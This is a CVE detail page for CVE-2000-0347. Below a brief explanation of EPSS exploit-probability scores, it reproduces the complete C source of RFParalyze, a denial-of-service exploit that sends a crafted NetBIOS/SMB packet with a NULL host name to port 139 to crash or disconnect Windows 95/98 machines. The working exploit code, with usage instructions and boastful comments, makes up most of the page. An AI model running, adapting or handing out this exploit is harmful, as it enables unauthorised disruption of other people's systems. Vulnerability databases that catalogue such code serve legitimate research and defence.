CVE-2000-0347 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

// source: https://www.securityfocus.com/bid/1163/info Unpredictable results, including system crashes, lock-ups, reboots, and loss of network connectivity, can occur in Windows 95/98 if a NetBIOS session packet is received with the source host name set to NULL. /*********************************** www.el8.org **** www.wiretrip.net **/ /* - el8.org advisory: RFParalyze.c code by rain forest puppy <rfp@wiretrip.net> - coolness exhibited by Evan Brewer <dm@el8.org> - - Usage: RFParalyze <IP address> <NetBIOS name> where <IP address> is the IP address (duh) of the target (note: not DNS name). <NetBIOS name> is the NetBIOS name (again, duh) of the server at the IP address given. A kiddie worth his scripts should be able to figure out how to lookup the NetBIOS name. Note: NetBIOS name must be in upper case. This code was made from a reverse-engineer of 'whisper', a binary-only exploit found in the wild. I have only tested this code on Linux. Hey, at least it's not in perl... ;) -rfp */ #include <stdio.h> /* It's such a shame to waste */ #include <stdlib.h> /* this usable space. Instead, */ #include <string.h> /* we'll just make it more */ #include <netdb.h> /* props to the men and women */ #include <sys/socket.h> /* (hi Tabi!) of #!adm and */ #include <sys/types.h> /* #!w00w00, because they rock */ #include <netinet/in.h> /* so much. And we can't forget*/ #include <unistd.h> /* our friends at eEye or */ #include <string.h> /* Attrition. Oh, +hi Sioda. :) */ /* Magic winpopup message This is from \\Beav\beavis and says "yeh yeh" Ron and Marty should like the hardcoded values this has ;) */ char blowup[]= "\x00\x00\x00\x41\xff\x53\x4d\x42\xd0\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x19\x00\x04\x42\x45\x41\x56\x00\x04\x42\x45\x41\x56\x49" "\x53\x00\x01\x08\x00\x79\x65\x70\x20\x79\x65\x70\x00\x00"; struct sreq /* little structure of netbios session request */ { char first[5]; char yoname[32]; char sep[2]; char myname[32]; char end[1]; }; void Pad_Name(char *name1, char *name2); /* Thanks Antilove/ADM 4 codez!*/ int main(int argc, char *argv[]){ char buf[4000], myname[33], yoname[33]; struct sockaddr_in sin; int sox, connex, x; struct sreq smbreq; printf("RFParalyze -- this code by rfp/ADM/Wiretrip/ and dm/el8/\n"); if (argc < 3) { printf("Usage: RFParalyze <IP of target> <NetBIOS name>\n"); printf(" --IP must be ip address, not dns\n"); printf(" --NetBIOS name must be in UPPER CASE\n\n"); exit(1);} printf("Greetz to el8.org, Technotronic, w00w00, USSR, and ADM!\n"); Pad_Name("WICCA",myname); /* greetz to Simple Nomad/NMRC */ myname[30]='A'; /* how was Beltaine? :) */ myname[31]='D'; Pad_Name(argv[2],yoname); yoname[30]='A'; yoname[31]='D'; printf("Trying %s as NetBIOS name %s \n",argv[1],argv[2]); sin.sin_addr.s_addr = inet_addr(argv[1]); sin.sin_family = AF_INET; sin.sin_port = htons(139); sox = socket(AF_INET,SOCK_STREAM,0); if((connex = connect(sox,(struct sockaddr_in *)&sin,sizeof(sin))) < 0){ perror("Problems connecting: "); exit(1);} memset(buf,0,4000); memcpy(smbreq.first,"\x81\x00\x00\x44\x20",5); /*various netbios stuffz*/ memcpy(smbreq.sep,"\x00\x20",2); /*no need to worry about*/ memcpy(smbreq.end,"\x00",1); /*what it does :) */ strncpy(smbreq.myname,myname,32); strncpy(smbreq.yoname,yoname,32); write(sox,&smbreq,72); /* send initial request */ x=read(sox,buf,4000); /* get their response */ if(x<1){ printf("Problem, didn't get response\n"); exit(1);} if(buf[0]=='\x82') printf("Enemy engaged, going in for the kill..."); else {printf("We didn't get back the A-OK, bailing.\n"); exit(1);} write(sox,&blowup,72); /* send the magic message >:) */ x=read(sox,buf,4000); /* we really don't care, but sure */ close(sox); printf("done\n"); } void Pad_Name(char *name1, char *name2) { char c, c1, c2; int i, len; len = strlen(name1); for (i = 0; i < 16; i++) { if (i >= len) { c1 = 'C'; c2 = 'A'; /* CA is a space */ } else { c = name1[i]; c1 = (char)((int)c/16 + (int)'A'); c2 = (char)((int)c%16 + (int)'A'); } name2[i*2] = c1; name2[i*2+1] = c2; } name2[32] = 0; /* Put in the null ...*/ } /*********************************** www.el8.org **** www.wiretrip.net **/